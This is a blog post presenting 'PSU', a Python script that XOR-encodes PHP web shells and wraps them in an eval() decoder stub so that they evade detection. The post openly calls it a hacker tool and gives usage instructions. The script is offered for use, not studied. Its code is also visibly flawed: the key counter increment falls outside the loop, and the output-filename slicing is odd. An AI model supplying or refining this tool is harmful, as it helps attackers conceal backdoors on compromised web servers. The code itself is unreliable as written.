PSU

What is PSU ?
PSU is a xor encoder for php shells (“php shell undetector”, indeed a tool for hackers)
You can xor your php code with the following code.

#!/usr/bin/python

import sys

def usage() :
	print 'Usage : %s [file] [key]' % sys.argv[0]
	exit()


def main(fn, key) :
	try :
		Input = file(fn, 'r').read()

	except :
		usage()

	enc = ''
	res = ''
	c = 0

	if Input.find('<?php') != -1 :
		Input = Input.replace('<?php', '')

	elif Input.find('<?') != -1 :
		Input = Input.replace('<?', '')

	elif Input.find('?>') != -1 :
		Input = Input.replace('?>', '')

	for i in Input :
		enc += chr(ord(i) ^ ord(key[c]))

		if c == len(key)-1 :
			c = 0
		continue
	c += 1

	for ii in enc :
		res += r'\x' + ii.encode('hex')

	x = fn[:-fn.find('.')-2]
	y = x + 'xored.'
	z = y + fn[fn.find('.')+1:]

	Output = file(z, 'w')
	Output.write('<?php\n')
	Output.write('$code = "' + res + '";\n')
	Output.write('$key = "' + key + '";\n')
	Output.write('''$mcode = "";
	$c2 = 0;

	for ($c=0; $c<=strlen($code)-1; $c++)
{
	$mcode .= chr(ord($code[$c]) ^ ord($key[$c2]));
	if ($c2 == strlen($key)-1)
	{
		$c2 = 0;
		continue;
	}
	$c2++;
}
eval($mcode);
?>''')
	Output.close()



if len(sys.argv) == 3 :
	main(sys.argv[1], sys.argv[2])
	print 'Done!'

else :
	usage()

Usage
python PSU.py [file] [key]

e.g.
python PSU.py test.php s1n4

This makes a file with the name of “test.xored.php”, this is output.

About these ads

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s